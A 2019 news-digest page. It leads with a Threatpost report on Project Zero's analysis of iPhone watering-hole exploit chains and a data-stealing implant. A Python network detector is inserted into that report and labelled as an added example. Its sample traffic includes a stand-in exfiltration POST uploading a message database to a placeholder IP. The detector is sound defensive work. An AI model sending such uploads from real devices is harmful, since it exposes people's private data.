
Friday, August 30, 2019


Technology - Google News


iPhone Zero-Days Anchored Watering-Hole Attacks - Threatpost

Posted: 30 Aug 2019 08:48 AM PDT

A new, highly capable spyware payload can monitor everything in a person's digital life.

A total of 14 iPhone vulnerabilities, including two that were still zero-days when discovered, were targeted by five exploit chains in a watering-hole campaign that ran for at least two years.

The watering holes deliver a spyware implant that can steal private data like iMessages, photos and GPS location in real time, according to Ian Beer with Google's Project Zero team.

"There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant," he wrote in a blog post on Friday. "We estimate that these sites receive thousands of visitors per week."

Beer said there were seven bugs for the iPhone's web browser, five for the kernel and two separate sandbox escapes used in the attack. Google was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12.

"Initial analysis indicated that at least one of the privilege escalation chains was still 0-day and unpatched at the time of discovery [in January] (CVE-2019-7287 & CVE-2019-7286)," he wrote.

He added that the scope of the versions targeted "indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years."

Google reported the issues to Apple on Feb. 1, 2019 with a seven-day disclosure deadline, which resulted in the out-of-band release of iOS 12.1.4 on Feb. 7, 2019; the vulnerabilities were publicly disclosed at that point.

The malware payload used in the attack is a custom implant built for monitoring. It polls a command-and-control (C2) server for commands every 60 seconds and is primarily focused on stealing files and uploading live location data. Beer's analysis showed that it defeats some of the protections that dissidents, for example, rely on to protect their privacy (and in many cases their physical safety).

According to Beer, the attackers used the exploit chains to gain unsandboxed code execution as root on the iPhone. From there they called "posix_spawn," passing the path to the implant binary they had dropped in /tmp, which starts the implant running in the background as root.

"The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in," the researcher detailed. "Using jtool, we can view the entitlements the implant has…the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary's code signature to the kernel trust cache."

In his testing, Beer was able to use the implant to pull the database files that encrypted messaging apps such as WhatsApp, Telegram and iMessage keep on the device, recovering the plaintext of messages sent and received: end-to-end encryption protects messages in transit, not the local message store that a root process can read.

That same technique could be used across the device.

"The implant can upload private files used by all apps on the device; [such as] the plaintext contents of emails sent via Gmail, which are uploaded to the attacker's server," Beer said.

The implant also takes a copy of the user's complete contacts database, including the full names and numbers stored in the iPhone contacts, copies photos, and can upload the user's location in real time, up to once per minute, while the device is online.

Then there's the keychain, which the iPhone uses to store credentials and certificates, such as the SSIDs and passwords for all saved Wi-Fi access points.

"The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account," Beer said. "These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running."

The IP address of the server to upload content to is hardcoded in the implant binary.

"This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string "9ff7172192b7" delimiting the fields in the body data)," Beer explained.

Also concerning is the fact that the implant's own traffic is not encrypted: everything is sent to the C2 over plain HTTP, not HTTPS, so the stolen data is exposed to anyone on the network path, not just the attackers.

"If you're connected to an unencrypted Wi-Fi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command-and-control server," Beer said. "This means that not only is the endpoint of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server."
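Because the implant's traffic is plaintext, the two behaviours described above (a 60-second C2 poll and multipart/form-data uploads with a hardcoded boundary to a hardcoded IP) are visible to any network tap, Wi-Fi gateway or egress proxy even though nothing is visible on the device itself. The following is an added example, not code from Project Zero or Threatpost: it parses captured HTTP requests, flags POSTs that carry a multipart body with the boundary string Beer reported to a bare-IP host, and flags any host polled at a near-constant 60-second cadence. The sample traffic, the address 203.0.113.7, the /cmd and /upload paths, the field names and the file name messages.db are constructed, and the database-file suffix heuristic is an assumption rather than something the article states.

```python
"""Added detection example for the implant's network behaviour as described in the
article. Sample traffic, 203.0.113.7, /cmd, /upload and the file names are constructed."""
from __future__ import annotations
import re
import statistics
from collections import namedtuple
from datetime import datetime, timedelta

KNOWN_BOUNDARY = "9ff7172192b7"  # boundary string reported in Beer's implant teardown
BARE_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
SUSPICIOUS_SUFFIXES = (".db", ".sqlite", ".plist")  # assumption: app data stores look like this

HttpRequest = namedtuple("HttpRequest", "ts method host path headers body")

def parse_http_request(ts: datetime, raw: bytes) -> HttpRequest:
    """Parse one raw HTTP/1.x request (request line, headers, body) as captured on the wire."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(ts, method, headers.get("host", ""), path, headers, body)

def multipart_parts(body: bytes, boundary: str) -> list[tuple[str, bytes]]:
    """Split a multipart body into (filename-or-field-name, content) pairs; indicator-grade, not RFC 7578."""
    delim = b"--" + boundary.encode()
    parts: list[tuple[str, bytes]] = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        hdrs, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disp = hdrs.decode("latin-1")
        m = re.search(r'filename="([^"]*)"', disp) or re.search(r'name="([^"]*)"', disp)
        parts.append((m.group(1) if m else "", content.rstrip(b"\r\n")))
    return parts

def flag_exfil_post(req: HttpRequest) -> list[str]:
    """Per-request indicators: POST to a bare IP, the known boundary, database-like uploads."""
    reasons: list[str] = []
    if req.method != "POST":
        return reasons
    if BARE_IP_HOST.match(req.host):
        reasons.append("POST to bare-IP host (hardcoded C2 pattern)")
    ctype = req.headers.get("content-type", "")
    m = None
    if ctype.lower().startswith("multipart/form-data"):
        m = re.search(r'boundary="?([^";]+)"?', ctype)
    if m and m.group(1) == KNOWN_BOUNDARY:
        reasons.append(f"multipart boundary {m.group(1)!r} matches implant indicator")
    if m:
        names = [name for name, _ in multipart_parts(req.body, m.group(1))]
        if any(n.endswith(SUSPICIOUS_SUFFIXES) for n in names):
            reasons.append(f"uploads database/plist files: {names}")
    return reasons

def flag_beaconing(stamps: list[datetime], expected: float = 60.0, tolerance: float = 2.0, min_gaps: int = 3) -> bool:
    """True when one host is contacted at a near-constant interval close to `expected` seconds."""
    if len(stamps) <= min_gaps:
        return False
    ordered = sorted(stamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    return abs(statistics.median(gaps) - expected) <= tolerance and statistics.pstdev(gaps) <= tolerance

def analyze_capture(capture: list[tuple[datetime, bytes]]) -> dict[str, list[str]]:
    """Run both detectors over (timestamp, raw request) pairs; return host -> reasons."""
    findings: dict[str, list[str]] = {}
    seen: dict[str, list[datetime]] = {}
    for ts, raw in capture:
        req = parse_http_request(ts, raw)
        seen.setdefault(req.host, []).append(req.ts)
        reasons = flag_exfil_post(req)
        if reasons:
            findings.setdefault(req.host, []).extend(reasons)
    for host, stamps in seen.items():
        if flag_beaconing(stamps):
            findings.setdefault(host, []).append("fixed ~60 s polling cadence (implant beacon)")
    return findings

# Constructed sample traffic; 203.0.113.7 (TEST-NET-3) stands in for the hardcoded C2 IP.
BASE = datetime(2019, 1, 15, 12, 0, 0)
GET = b"GET /cmd HTTP/1.1\r\nHost: %s\r\n\r\n"
SAMPLE_POST = (
    b"POST /upload HTTP/1.1\r\nHost: 203.0.113.7\r\n"
    b"Content-Type: multipart/form-data; boundary=9ff7172192b7\r\n\r\n"
    b'--9ff7172192b7\r\nContent-Disposition: form-data; name="file"; filename="messages.db"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\nSQLite format 3\x00...\r\n"
    b'--9ff7172192b7\r\nContent-Disposition: form-data; name="note"\r\n\r\nhello\r\n'
    b"--9ff7172192b7--\r\n"
)

def at(*secs: int) -> list[datetime]:
    return [BASE + timedelta(seconds=s) for s in secs]

SAMPLE_CAPTURE = (
    [(t, GET % b"203.0.113.7") for t in at(0, 60, 119, 181, 240)]
    + [(at(300)[0], SAMPLE_POST)]
    + [(t, GET % b"example.com") for t in at(0, 5, 300)]
)
```

Running `analyze_capture(SAMPLE_CAPTURE)` flags only 203.0.113.7, with three per-request reasons for the upload and one for the polling cadence; the three benign requests to example.com produce nothing. The cadence check uses median and population standard deviation of the inter-request gaps so a little jitter does not hide the beacon, and the boundary string is the strongest single indicator here because the attackers hardcoded it in the binary.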

The malware is not persistent and is cleared if the iPhone is rebooted. However, "given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device," Beer said.

Users have no way of knowing they have been infected, so the implant can keep tabs on them for as long as they go without rebooting.

"There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system," according to the researcher.

He said the watering-hole sites (which he did not name) clearly target particular communities. Though he did not say explicitly whether those were political or demographic groups, Beer intimated the former.

"I hope to guide the general discussion around exploitation away from a focus on the million dollar dissident and towards discussion of the marginal cost for monitoring the n+1'th potential future dissident," he said. "I shan't get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million. I will instead suggest that all of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time."

He also said that the watering holes, zero-days and exploits that Google discovered are likely the tip of the iceberg: "For this one campaign that we've seen, there are almost certainly others that are yet to be seen."


Dell XPS 13 deal: Save $600 on one of our favorite laptops - CNET

Posted: 30 Aug 2019 06:30 AM PDT


Get a high-end Dell XPS 13 configuration for very near the price of the entry-level model.

Sarah Tew/CNET

Back in March, Dell introduced a new version of its already-very-good XPS 13 laptop. Dan Ackerman's verdict: "We've finally run out of complaints." The near-perfect system easily won a spot on CNET's list of the best laptops for 2019. Of course, it's not an inexpensive machine, especially when you start piling on high-end features like a blazing fast processor, big solid-state drive and ultra-HD touch display. 

That's what makes today's deal so exciting. For a limited time, and while supplies last, the Dell XPS 13 is $979.99 when you apply coupon code DBLTXPS133 at checkout. That's $620 (!) off the regular price, though the promotion says "save $600," so I'm not sure what accounts for the extra $20. Note that CNET may get a share of revenue from the sale of the products featured on this page.

But, wait, it can get even better: Rakuten (formerly Ebates) is offering 8% cash back on Dell purchases, which would bring your net total (not including sales tax) down to just over $900. My advice: Use the Rakuten browser plug-in to greatly simplify taking advantage of cash-back offers like this.

This particular XPS 13 configuration is pretty decked-out: Intel Core i7 processor, 256GB SSD and a 13.3-inch 4K Ultra HD 3,840x2,160-pixel InfinityEdge touch display. If there's a weak spot, it's the RAM: just 8GB. It's sufficient, but 16GB would be preferable in a system like this.

For more info, I'll turn you over to Ackerman's aforementioned Dell XPS 13 review. Beyond that, I'll just note that Dell often has very limited quantities available for these kinds of deals, so while it's in stock as of this writing, it may not be for much longer. If you've been eyeballing this machine, act fast.


Bonus deal: Ninja's 6-quart pressure cooker is on sale for just $50

Instant Pot is far from the only pressure-cooker game in town. There are plenty of other models that are just as good -- and when they're on sale, they're arguably even better.

For a limited time, and while supplies last, Best Buy has the Ninja PC101 6-quart pressure cooker for $49.99. Regular price: $99.99.

Also able to steam, saute and slow-cook, the Ninja lacks a few of the fancier options (like yogurt-making) found in higher-end cookers, but definitely handles all the basics. It has a fully removable lid, a steam rack and an extra o-ring.

Particularly telling: Nearly 200 buyers collectively rated this 4.8 stars out of 5. If you don't already have a pressure cooker, you should -- but you shouldn't pay upward of $100 for one.




Man Of Medan: 13 Character Death Scenes - IGN

Posted: 30 Aug 2019 02:00 AM PDT
